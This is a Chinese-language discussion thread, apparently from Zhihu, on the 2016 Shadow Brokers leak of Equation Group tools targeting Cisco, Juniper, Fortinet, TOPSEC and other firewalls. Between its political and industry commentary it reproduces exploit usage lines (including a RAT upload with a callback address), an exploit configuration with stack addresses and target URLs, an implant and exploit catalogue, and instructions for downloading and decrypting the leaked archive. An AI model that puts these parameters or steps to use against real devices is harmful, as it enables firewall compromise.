美國 NSA 方程式組織（Equation Group）爆出的事件，將會造成哪些影響？

01-04

有黑客聲稱黑進了方程式組織，並且正在拍賣偷來的 Exploits。
/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group
壓縮包下載（解壓密碼： theequationgroup）
MEGA DOWNLOAD EquationGroup Files

泄露了兩個壓縮包，只有free-file的壓縮包能解開，另外一個暫時沒有密碼(100W個比特幣)：

$ ls -lah *.gpg -rw-rw-r--@ 1 noname staff 128M 7 25 10:49 eqgrp-auction-file.tar.xz.gpg -rw-rw-r--@ 1 noname staff 182M 7 25 10:50 eqgrp-free-file.tar.xz.gpg

free-file的文件主要涉及的內容是針對防火牆的掃描器、漏洞利用框架等等:

BLATSTING -- 窮舉爆破
EXPLOITS -- 漏洞利用代碼
OPS -- 攻擊操作控制工具包
SCRIPTS -- 腳本資源引用庫
TOOLS -- 輔助工具包(編碼轉換、IP格式轉換、加密解密裝換等等)

我們通過分析對應攻擊payload的文件名，就能大致上猜測出來，具體哪些防火牆版本受到影響，比如下面這個信息，我們就能通過google搜索出思科的CISCO ASA5505防火牆受影響。

# find /Firewall/BANANAGLEE/BG3000/ .//Install/SCP/asa5505_clean60000.bin .//Install/SCP/asa5505_clean70000.bin .//Install/SCP/asa5505_cleanE18BF.bin .//Install/SCP/asa5505_cleanEC480.bin .//Install/SCP/asa5505_patch60000.bin .//Install/SCP/asa5505_patchE18BF.bin .//Install/SCP/asa5505_patchEC480.bin .//Install/SCP/asaGen_clean10000_biosVer114or115.bin .//Install/SCP/asaGen_clean20000_biosVer100or112.bin

Cisco Adaptive Security Appliance SNMP Remote Code Execution Vulnerability

思科也跟著發現問題挺嚴重的，於是推補丁了。

Juniper NetScreen-ISG 2000 防火牆

# ls -lah ./Firewall/BARGLEE/BARGLEE3100/Install/LP drwxr-xr-x 23 noname staff 782B 8 16 12:35 . drwxr-xr-x 3 noname staff 102B 4 10 2010 .. -rwxr-xr-x 1 noname staff 1.8M 6 11 2013 BARPUNCH-3110 -rwxr-xr-x 1 noname staff 2.4M 6 11 2013 BICE-3110 drwxr-xr-x 6 noname staff 204B 4 10 2010 Modules -rwxr-xr-x 1 noname staff 1.7M 6 11 2013 SecondDateCommon-miniprog-3110 -rwxr-xr-x 1 noname staff 7.8K 6 11 2013 bg_redirect.pl-3110 -rwxr-xr-x 1 noname staff 431K 6 11 2013 bg_redirector-3110 -rwxr-xr-x 1 noname staff 1.9M 6 11 2013 cfMiniProg-3110 -rwxr-xr-x 1 noname staff 1.1M 6 11 2013 isg1000-moduledata-3113.tgz -rwxr-xr-x 1 noname staff 996K 6 11 2013 isg2000-moduledata-3113.tgz -rwxr-xr-x 1 noname staff 385K 6 11 2013 keygen-3110 -rwxr-xr-x 1 noname staff 285K 10 18 2013 maclist -rwxr-xr-x 1 noname staff 1.7M 6 11 2013 nsLogMiniProg-3110 -rwxr-xr-x 1 noname staff 413K 6 11 2013 pd_create_ruleset-3110 -rwxr-xr-x 1 noname staff 1.9M 6 11 2013 pd_miniprog-3110 -rwxr-xr-x 1 noname staff 6.2K 6 11 2013 pd_start_pat.pl-3110 -rwxr-xr-x 1 noname staff 1.8M 6 11 2013 profilerIpv4-3100 -rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg300-moduledata-3115.tgz -rwxr-xr-x 1 noname staff 29M 6 11 2013 ssg500-moduledata-3115.tgz -rwxr-xr-x 1 noname staff 13K 6 11 2013 start_redirector.pl-3110 -rwxr-xr-x 1 noname staff 42B 6 11 2013 stop_redirector.sh-3110 -rwxr-xr-x 1 noname staff 1.9M 6 11 2013 tunWiz-3110

同目錄下是針對該防火牆的利用代碼pl、sh，看選項帶有attack_ip字眼，自己體會

# perl pd_start_pat.pl-3110 Usage: pd_start_pat.pl --lp & --implant & --idkey & [--lptimeout &] [--bsize &] --cmd & --attack_ip & --intermediate_ip & --attack_int & --target_int & --port_offset &

--trans_timeout & --pat_timeout & --attack_port &

[--logdir &] [--help]


# perl start_redirector.pl-3110 // 隧道攻擊工具

Usage: start_redirector.pl --lp & --implant & --idkey &

       [--lptimeout &] [--bsize &] --cmd & --local_ip &

       --clr_tunnel_ip & --enc_tunnel_ip & --orig_src_ip & --enc_redir_ip & --clr_redir_ip &

       --target_ip & --enc_tunnel_pt &
 --enc_redir_pt &


       --enc_iface & --clr_iface &

       --enc_key & [--proto &
] [--redir_to_target_dest_pt &
]

       [--redir_to_target_src_pt &
] [--target_to_redir_dest_pt &
]

       [--target_to_redir_src_pt &
] [--tunnel_to_attacker_dest_pt &
]

       [--tunnel_to_attacker_src_pt &

] [--restart] --timeout & [--logdir &] [--help]

從整個文件結構來看，整個工具包建立時間為2010年

# ls -la -rw-r--r--@ 1 noname staff 6.0K 8 16 12:35 .DS_Store drwxr-xr-x 8 noname staff 272B 4 10 2010 BANANAGLEE drwxr-xr-x 3 noname staff 102B 4 10 2010 BARGLEE drwxr-xr-x 9 noname staff 306B 4 10 2010 BLATSTING drwxr-xr-x 4 noname staff 136B 4 10 2010 BUZZDIRECTION drwxr-xr-x 10 noname staff 340B 4 10 2010 EXPLOITS drwxr-xr-x 8 noname staff 272B 8 16 12:35 OPS drwxr-xr-x 35 noname staff 1.2K 8 16 12:35 SCRIPTS drwxr-xr-x 18 noname staff 612B 8 16 12:36 TOOLS drwxr-xr-x 4 noname staff 136B 8 16 12:35 TURBO -rw-r--r-- 1 noname staff 19M 4 10 2010 padding

攻擊框架的文件構成主要為腳本類型：python、perl、shell 腳本

# find ./ -name *.py | wc -l 235 # find ./ -name *.pl | wc -l 7 # find ./ -name *.sh | wc -l 15

BombShell的工具

Firewall/EXPLOITS/ELBO/ $ python eligiblebombshell_1.2.0.1.py Usage: eligiblebombshell_1.2.0.1.py [options]


See -h for specific options (some of which are required).
Examples:
Scan to find (unknown versions) or confirm (known versions) vulnerability:

  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --scan -v
Once a valid entry is in ELBO.config, upload nopen:

  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v
Delete uploaded files from the previous step:

  eligiblebombshell_1.2.0.1.py -t 1.2.3.4 -e 012-345-6789 --cleanup -v

eligiblebombshell_1.2.0.1.py: error: -t/--target-ip is required!

與eligiblebombshell_1.2.0.1對應的攻擊配置文件

# ELBO.config # # format for known versions: # ETAG = & : & : 0x& : & # format for unknown versions: # ETAG = & : & : 0x& # # The device returns wacky, invalid ETags sometimes. This file just records # the "normal" looking parts (without "" and other characters). E.g.: # # device ETag | this file # ---------------------|------------------ # "e8-569-46b6b873" | e8-569-46b6b873 # "3991-583-4727f5a3" | 3991-583-4727f5a3 # W/"55b-583-47958bb3" | 55b-583-47958bb3 # W/"55f-583-47e0a4a8" | 55f-583-47e0a4a8 # W/"600-5e7-494fd7a7" | 600-5e7-494fd7a7 # W/"69a-5e7-49c3697f" | 69a-5e7-49c3697f


# Path to RAT

NOSERVER = /current/up/morerats/staticrats/noserver-3.3.0.1-linux-i386-static 
#################################

# ETags from actual hardware

#################################
# tested

ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.2.100.010.1_pbc_17_iv_3

ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.001.050.1

ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.021.1

ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=KeepAuth : libc.0 : v3.3.002.030.1

ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.057.1

ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.061.1
# added Dec. 2009 - WOBBLYLLAMA

ETAG =  55b-583-487b260e : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.8_003
# added Mar. 2010 - FLOCKFORWARD

ETAG =  6c6-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : v3.3.005.066.1
# added Mar. 2010 - HIDDENTEMPLE

ETAG = 1065-569-44aa3cac : /cgi/maincgi.cgi?Url=Index : 0xbfffec70 : tos_3.2.8840.1
# added May. 2010 - CONTAINMENTGRID

ETAG = 83c-5e7-4a323af1 : /cgi/auth.cgi?Url=KeepAuth : libc.1 : tos_3.3.005.066.1
#BLATSTING SUPPORT FOR ALL ABOVE
# added Sep. 2010 - GOTHAMKNIGHT

ETAG = 386f-569-46e895e3 : /cgi/maincgi.cgi?Url=Index : 0xbfffec40 : v3.2.100.010.8_pbc_27
###################################################################

# BELOW IS FOR DEVELOPERS ONLY

###################################################################

# Etags and address from real hardware

#ETAG =   e6-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.2.100.010.1_pbc_17_iv_3

#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb50 : v3.3.001.050.1

#ETAG =  596-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1

#ETAG =  59a-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1

#ETAG =  641-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1

#ETAG =  6e4-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1

#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb40 : v3.3.005.061.1

# ETags and addresses from milliways

#ETAG =   e8-569-46b6b873 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.2.100.010_1_pbc_17_iv_3

#ETAG = 3991-583-4727f5a3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb60 : v3.3.001.050.1

#ETAG =  55b-583-47958bb3 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.021.1

#ETAG =  55f-583-47e0a4a8 : /cgi/auth.cgi?Url=UnrgrAuth : 0xbfffeb70 : v3.3.002.030.1

#ETAG =  600-5e7-494fd7a7 : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.057.1

#ETAG =  69a-5e7-49c3697f : /cgi/auth.cgi?Url=UnrgrAuth : 0x7fffcf50 : v3.3.005.061.1

#ETAG =   e8-569-46b6b873 : /cgi/maincgi.cgi?Url=Index : 0xbfffec50 : v3.2.100.010_1_pbc_17_iv_3

#ETAG = 3991-583-4727f5a3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb50 : v3.3.001.050.1

#ETAG =  55b-583-47958bb3 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.021.1

#ETAG =  55f-583-47e0a4a8 : /cgi/maincgi.cgi?Url=Index : 0xbfffeb60 : v3.3.002.030.1

#ETAG =  600-5e7-494fd7a7 : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.057.1

#ETAG =  69a-5e7-49c3697f : /cgi/maincgi.cgi?Url=Index : 0x7fffeb50 : v3.3.005.061.1

###################################################################
# SCANPLAN format (dates are INCLUSIVE and written as hex values just like the third etag field):

#   SCANPLAN = & : & : & : &
# Notes:

# - The full list of addresses must be all on one line.

# - SCANPLAN addresses CANNOT contain a null byte (00) - doing so will break the exploit"s

#   buffer overflow.

# - The --etag argument will be matched against the min/max dates of these scanplans. If more than

#   one plan matches, they will be tried in the order they"re listed in this file. If none match,

#   the user will get an error to that effect.
# libc attacks - scan plan is simple (try them both)

SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x00000000 : 0x494fd7a6 : libc.0,libc.1

SCANPLAN = /cgi/auth.cgi?Url=KeepAuth : 0x494fd7a7 : 0xffffffff : libc.1,libc.0
# for dates &<= versions we"ve see with stack at 0xc0000000, try the high addresses and then the low
SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80
# for dates &>= versions we"ve seen with stack at 0x8000000, try the low addresses and then the high

SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x494fd7a7 : 0xffffffff : 0x7fffcf80,0x7fffd280,0x7fffcc80,0x7fffd580,0x7fffc980,0x7fffd880,0x7fffc680,0x7fffdb80,0x7fffc380,0x7fffde80,0x7fffe180,0x7fffe480,0x7fffe780,0x7fffea80,0x7fffed80,0x7ffff080,0x7ffff380,0x7ffff680,0x7ffff980,0x7ffffc80,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180

# for dates in between the two, try low and high addresses interleaved

SCANPLAN = /cgi/auth.cgi?Url=UnrgrAuth : 0x487b260f : 0x494fd7a6 : 0x7fffcf80,0xbfffeb80,0x7fffd280,0xbfffee80,0x7fffcc80,0xbfffe880,0x7fffd580,0xbffff180,0x7fffc980,0xbfffe580,0x7fffd880,0xbffff480,0x7fffc680,0xbfffe280,0x7fffdb80,0xbffff780,0x7fffc380,0xbfffdf80,0x7fffde80,0xbffffa80,0x7fffe180,0xbfffdc80,0x7fffe480,0xbfffd980,0x7fffe780,0xbfffd680,0x7fffea80,0xbfffd380,0x7fffed80,0xbfffd080,0x7ffff080,0xbfffcd80,0x7ffff380,0xbfffca80,0x7ffff680,0xbfffc780,0x7ffff980,0xbfffc480,0x7ffffc80,0xbfffc180

# for dates &<= versions we"ve see with stack at 0xc0000000, try the high addresses and then the low SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x00000000 : 0x487b260e : 0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180,0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180 # for dates &>= versions we"ve seen with stack at 0x8000000, try the low addresses and then the high SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x494fd7a7 : 0xffffffff : 0x7fffeb80,0x7fffee80,0x7fffe880,0x7ffff180,0x7fffe580,0x7ffff480,0x7fffe280,0x7ffff780,0x7fffdf80,0x7ffffa80,0x7fffdc80,0x7fffd980,0x7fffd680,0x7fffd380,0x7fffd080,0x7fffcd80,0x7fffca80,0x7fffc780,0x7fffc480,0x7fffc180,0xbfffeb80,0xbfffee80,0xbfffe880,0xbffff180,0xbfffe580,0xbffff480,0xbfffe280,0xbffff780,0xbfffdf80,0xbffffa80,0xbfffdc80,0xbfffd980,0xbfffd680,0xbfffd380,0xbfffd080,0xbfffcd80,0xbfffca80,0xbfffc780,0xbfffc480,0xbfffc180 # for dates in between the two, try low and high addresses interleaved SCANPLAN = /cgi/maincgi.cgi?Url=Index : 0x487b260f : 0x494fd7a6 : 0xbfffeb80,0x7fffeb80,0xbfffee80,0x7fffee80,0xbfffe880,0x7fffe880,0xbffff180,0x7ffff180,0xbfffe580,0x7fffe580,0xbffff480,0x7ffff480,0xbfffe280,0x7fffe280,0xbffff780,0x7ffff780,0xbfffdf80,0x7fffdf80,0xbffffa80,0x7ffffa80,0xbfffdc80,0x7fffdc80,0xbfffd980,0x7fffd980,0xbfffd680,0x7fffd680,0xbfffd380,0x7fffd380,0xbfffd080,0x7fffd080,0xbfffcd80,0x7fffcd80,0xbfffca80,0x7fffca80,0xbfffc780,0x7fffc780,0xbfffc480,0x7fffc480,0xbfffc180,0x7fffc180

大半年後的今天，再來看這個問題，感慨萬千，身為「資深」從業人員，我們還是低估了黑產的膽子，以及高估了用戶的意識，NSA工具曝光的餘波，居然會這麼巨大，估計當初誰也沒能想到。

事後來補充幾點吧：

1、國家級的信息武器庫確實存在，而且威力巨大，一個已經曝光近一年的攻擊工具仍然可以造成這麼大範圍的影響，可以想見，潛藏在水面下的龐大武器庫對世界各國的國家安全將會構成多大的威脅。不僅如此，這些軍用級的武器還可能會泄漏出來，成為黑產團隊的利器，同樣也會對普通的企業和個人造成致命的打擊。

2、這一系列事件的發生，會促使各國政府對國家安全和基礎公共設施的信息安全，進一步加大投入；企業和個人的信息資產價值也越來越高，必然將成為黑色產業鏈的目標，對抗黑產和保護個人及企業的信息資產，也會越來越重要，從而帶動整個信息安全行業快速發展；

3、信息技術飛速發展，從互聯網到移動互聯網然後到物聯網、車聯網，不僅信息資產價值指數級提高，安全防範的複雜度也急劇升高，目前的一些防禦手段還不能完全跟上形勢，舊的產業布局也未必合適，這會進一步刺激新技術、新產品的研究開發，對產業發展帶來一波新的機遇；

以下是原文：

這件事的政治意義遠大於技術意義。

先看看目前泄漏的防火牆廠商的分布圖

基本上就是中美兩國，是不是有種環太平洋的感覺？

上面涉及到的防火牆品牌有：
華為（中國最大的網路設備供應商）18.5%
天融信（中國最大的防火牆供應商）6.7%
思科（美國最大的網路設備供應商）27.9%
Juniper（美國第二大網路設備供應商）14.1%
飛塔（美國最大的防火牆供應商之一）2.1%
WatchGuard（美國著名的防火牆供應商）

這是什麼概念呢？我們來看一下2013年1月互聯網消費調研中心做出的中國防火牆市場品牌關注比例分布：

上述幾個品牌產品加在一起超過了70%，有沒有一種通殺的感覺？

我們再來看下時間線：

2007年，美國國家安全局（也就是本文的主角）開始實施稜鏡計劃，全面監視互聯網。

2013年6月，前中情局僱員愛德華斯諾登對媒體披露稜鏡計劃，並指出美國政府支持的黑客對全球多個國家進行了黑客攻擊。

2013年10月2日，美國FireEye火眼公司發布《世界網路大戰：理解網路攻擊背後的國家意圖》，文中特別針對中國進行了指責。

2013年，中美兩國領導人多次會晤，就網路安全問題達成共識：承認網路攻擊事件存在，調查已經被發現的網路攻擊問題，進行雙方對話，劃定可以接受的底線。

這次泄漏的攻擊工具，大部分都創建於上述事件發生的前後，NSA已經關站自查，據說懷疑有內奸，代號「資深斯諾登」，這還真是諜影重重啊。

最終，中美兩國簽訂了網路安全合作協議，承諾相互之間不進行網路攻擊（誰信啊），然後Fireeye火眼的股價從八十美金暴跌到十八美金，這也不知道算不算是作繭自縛了。

再看下本次事件的拍賣價格，一百萬比特幣，也就是5.68億美金，38億人民幣，這個價格，任何黑客組織或者商業公司都難以支付，如果不是故意設這麼高，那能夠買單的也只有國家了。

感謝啟明星辰ADLAB實驗室提供相關數據和技術支持。

首先，泄露的文件絕對是核武器級的。文件數量如此之大！！！攻擊模塊如此完整！！！分類如此清晰！！！個人認為Equation Group本身被網路滲透的可能性不大，更像是被整體搬運，比如文件伺服器或者是硬碟拷貝之類，人為泄密可能性更大。會不會是snowden事件後半場？

1、NSA嚴查泄密事件，整頓軍紀。武器報廢，重寫核心模塊保住關鍵目標

2、隊友被坑，Five Eyes相關國家會重新評估對NSA的依賴和信任程度

3、各國家隊攻擊水平提升N個檔次，進一步縮小和世界一流水平差距

4、各國關鍵單位、節點安全大檢查，重點就是路由、FW等網路設備。GA/WB/PC等機構有得忙一陣了，乙方安全公司紛紛發布研究報告、檢查工具，互聯網公司檢查自己的設備是否中招

5、各網路設備廠商表示不明真相，向客戶保證加強設備安全性

6、你猜對了，就是黑產。專業黑產團隊腦洞大開，互聯網的腥風血雨來了~~~

github下載地址：GitHub - hackstoic/eqgrp-free-file: Free sampling of files from the purported Equation Group hack.

－－－2016-08-24 updated----

e安全對各模塊的功能分析

美國NSA「方程式組織」使用的黑客工具列表及功能解釋

－－－2016-08-22 updated----

天融信產品的相關漏洞利用

NSA方程式組織（Equation Group）泄露的天融信產品漏洞分析（一）

－－－2016-08-21 updated----

大家可以重點關注下SecondDate相關的代碼和工具,美國國安局在巴基斯坦和黎巴嫩的行動中曾使用過這個工具

網路報道- 斯諾登：美國網路戰爭「武器庫」被襲擊

有安全愛好者對eqgrp的相關文件做了深度分析和測試

NSA（美國國安局）泄漏文件深度分析（PART 1）

－－－2016-08-20 updated----

今天看到有安全團隊分析了相關的文件。感興趣的可以看一下。

8月19日：Shadow-Brokers所泄露文件的介紹、技術分析（上）

－－－2016-08-18 created ---

目前GitHub · Where software is built 這個鏈接的地址已經打不開了。

我fork了一份出來，供大家下載。如果下載不了，後面我會上傳到百度網盤，發一個百度網盤的鏈接。

github下載地址：GitHub - hackstoic/eqgrp-free-file: Free sampling of files from the purported Equation Group hack.

可能有些人不會解壓，寫一個下載解壓方法：

1.下載：MEGA 百度網盤轉存鏈接見：https://pan.baidu.com/s/1nvKZ4ud

2.解壓：EQGRP-Auction-Files.zip 存在

3.下載gpg；

mac下：

brew install gnupg

windows下：

下載 https://files.gpg4win.org/gpg4win-2.3.3.exe 並安裝

其他系統見：

https://www.gnupg.org/download/

4. 解壓 eqgrp-free-file.tar.xz.gpg ：（eqgrp-auction-file.tar.xz.gpg 暫無密碼）

localhost:~ niming$ gpg /Users/niming/Downloads/EQGRP-Auction-Files/eqgrp-free-file.tar.xz.gpg gpg: AES256 加密過的數據 gpg: 以 1 個密碼加密

5.輸入密碼：theequationgroup，得到eqgrp-free-file.tar.xz

6.mac下直接雙擊解壓即可

7.小白們，一起裝逼一起浪起來吧

free文件夾中包含如下內容：（from: Equation Group Firewall Operations Catalogue ）

Exploits EGREGIOUSBLUNDER A remote code execution exploit for Fortigate firewalls that exploits a HTTP cookie overflow vulnerability. It effects models 60, 60M, 80C, 200A, 300A, 400A, 500A, 620B, 800, 5000, 1000A, 3600, and 3600A. The model of the firewall is detected by examining the ETag in the HTTP headers of the firewall. This is not CVE-2006-6493 as detected by Avast.


ELIGIBLEBACHELOR

An exploit for TOPSEC firewalls running the TOS operation system,

affecting versions 3.2.100.010, 3.3.001.050, 3.3.002.021 and 3.3.002.030.

The attack vector is unknown but it has an XML-like payload that starts with &.
ELIGIBLEBOMBSHELL

A remote code execution exploit for TOPSEC firewalls that exploits a HTTP cookie command injection vulnerability,

affecting versions 3.2.100.010.1pbc17iv3 to 3.3.005.066.1. Version detection by ETag examination.
WOBBLYLLAMA

A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version 3.3.002.030.8_003.
FLOCKFORWARD

A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version 3.3.005.066.1.
HIDDENTEMPLE

A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.2.8840.1.
CONTAINMENTGRID

A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.3.005.066.1.
GOTHAMKNIGHT

A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version 3.2.100.010.8pbc27. Has no BLATSTING support.
ELIGIBLECANDIDATE

A remote code execution exploit for TOPSEC firewalls that exploits a HTTP cookie command injection vulnerability,

affecting versions 3.3.005.057.1 to 3.3.010.024.1.
ELIGIBLECONTESTANT

A remote code execution exploit for TOPSEC firewalls that exploits a HTTP POST paramter injection vulnerability,

affecting versions 3.3.005.057.1 to 3.3.010.024.1. This exploit can be tried after ELIGIBLECANDIDATE.
EPICBANANA

A privilege escalation exploit against Cisco Adaptive Security Appliance (ASA) and Cisco Private Internet eXchange (PIX) devices. Exploitation takes advantage of default Cisco credentials (password: cisco).

 Affects ASA versions 711, 712, 721, 722, 723, 724, 80432, 804, 805, 822, 823, 824, 825, 831, 832 and PIX versions 711, 712, 721, 722, 723, 724, 804.
ESCALATEPLOWMAN A privilege escalation exploit against WatchGuard firewalls of unknown versions that injects code via the ifconfig command.
EXTRABACON A remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices

affecting ASA versions 802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844.

 It exploits an overflow vulnerability using the Simple Network Management Protocol (SNMP) and relies on knowing the target"s uptime and software version.
BOOKISHMUTE

An exploit against an unknown firewall using Red Hat 6.0.
FALSEMOREL

Allows for the deduction of the "enable" password from data freely offered by an unspecified firewall (likely Cisco) and obtains privileged level access using only the hash of the "enable" password. Requires telnet to be installed on the firewall"s inside interface.

Implants BLATSTING A firewall software implant that is used with EGREGIOUSBLUNDER (Fortigate) and ELIGIBLEBACHELOR (TOPSEC). BANANAGLEE A non-persistent firewall software implant for Cisco ASA and PIX devices that is installed by writing the implant directly to memory. Also mentioned in the previously leaked NSA ANT catalogue. BANANABALLOT A BIOS module associated with an implant (likely BANANAGLEE). BEECHPONY A firewall implant that is a predecessor of BANANAGLEE. JETPLOW A firmware persistence implant for Cisco ASA and PIX devices that persists BANANAGLEE. Also mentioned in the previously leaked NSA ANT catalogue. SCREAMINGPLOW Similar to JETPLOW. BARGLEE A firewall software implant. Unknown vendor. BUZZDIRECTION A firewall software implant for Fortigate firewalls. FEEDTROUGH A technique for persisting BANANAGLEE and ZESTYLEAK implants for Juniper Netscreen firewalls. Also mentioned in the previously leaked NSA ANT catalogue. JIFFYRAUL A module loaded into Cisco PIX firewalls with BANANAGLEE. BANNANADAIQUIRI An implant associated with SCREAMINGPLOW. Yes, banana is spelled with three Ns this time. POLARPAWS A firewall implant. Unknown vendor. POLARSNEEZE A firewall implant. Unknown vendor. Tools BILLOCEAN Retrieves the serial number of a firewall, to be recorded in operation notes. Used in conjunction with EGREGIOUSBLUNDER for Fortigate firewalls. FOSHO A Python library for creating HTTP exploits. BARICE A tool that provides a shell for installing the BARGLEE implant. DURABLENAPKIN A tool for injecting packets on LANs. BANANALIAR A tool for connecting to an unspecified implant (likely BANANAGLEE). PANDAROCK A tool for connecting to a POLARPAWS implant. SECONDDATE A packet injection module for Cisco PIX devices. TEFLONDOOR A self-destructing post-exploitation shell for executing an arbitrary file. The arbitrary file is first encrypted with a key. 1212/DEHEX Converts hexademical strings to an IP addresses and ports. XTRACTPLEASING Extracts something from a file and produces a PCAP file as output. NOPEN A post-exploitation shell consisting of a client and a server that encrypts data using RC6. The server is installed on the target machine.

利用工具(EQGRP-Auction-Files/Firewall/EXPLOITS/)縮寫解釋（from:Equation Group（NSA合作黑客組織）的攻擊工具分析）

EGBL = EGREGIOUS BLUNDER (Fortigate防火牆 + HTTPD exploit (apparently 2006 CVE ) ELBA = ELIGIBLE BACHELOR ELBO = ELIGIBLE BOMBSHELL (天融信(TOPSEC)防火牆 versions 3.3.005.057.1 to 3.3.010.024.1) ELCA = ELIGIBLE CANDIDATE ELCO = ELIGIBLE CONTESTANT EPBA = EPIC BANANA ESPL = ESCALATE PLOWMAN EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4) BANANAGLEE = Juniper Netscreen Devices BARGLEE BLATSTING BUZZDIRECTION SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100) BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)


Tools

BILLOCEAN 檢測防火牆序列號
FOSHO 一個Python庫，用來創建利用的HTTP請求
BARICE 植入工具
DURABLENAPKIN 在區域網內注入數據包
BANANALIAR 植入工具
PANDAROCK 植入工具
SECONDDATE 針對思科 PIX設備的包注入
TEFLONDOOR 一個能自毀的程序
1212/DEHEX 轉換hexademical字元串到目標伺服器
XTRACTPLEASING 提取一些東西產生一個PCAP文件

NOPEN 有客戶端和服務端，通過RC6對數據加密。

NSA黑客工具泄露網路世界的災難級危機 - 知乎專欄

大概在一個月前，有個叫影子經紀人的黑客團隊攻破了方程式組織的網路大門，竊取了大量的內部信息，同時「影子經濟人」希望方程式組織支付只夠多的費用（要價100萬美金比特幣）用於贖回被竊取的內部資料，看上去這一切就像是黑吃黑。影子經紀人的黑客團隊為了證明自己的確攻破了方程式的大門，隨後在網上公布了他們武器庫的一部分資料。
當資料被公布的那一刻，全世界網路安全的人員驚呆了，這個武器庫如此之強大，就好像給你展示了一個時空穿越機器，而且這個機器可能是他的實驗室里眾多的設備之一，而且這東西可能人家很多年前就有了，擱在那都積灰了的陳舊設備。

有人提到過了，比hacking team的那些東西可刺激多了，純個人判斷，有內奸的可能性非常大。

------------------------------------------------------------------

歡迎關注個人微信公眾號

『』黑客與精釀『』

每天更新，歡迎鼓勵

http://weixin.qq.com/r/fzuLk2bE-TuCrSLw925t (二維碼自動識別)

多半年過去了，現在知道造成什麼影響了吧。

謝邀。

===================Updated 10.08===========================

所謂的影子經紀人已經被抓，50多歲的一個同志，是斯諾登的朋友。之前很多人猜測是不是跟黑希拉里和民主黨是一撥人，不是。FBI是對的，果然是內部人做的。所屬公司是美國網路軍火的承包商。那129m的未公開內容再也拿不到了.

順便更新下，方程式被爆第二天寫的沒發出來的文章：

舊文：世界第一APT組織"方程式"，被黑了！ - 劍走偏鋒 - 知乎專欄
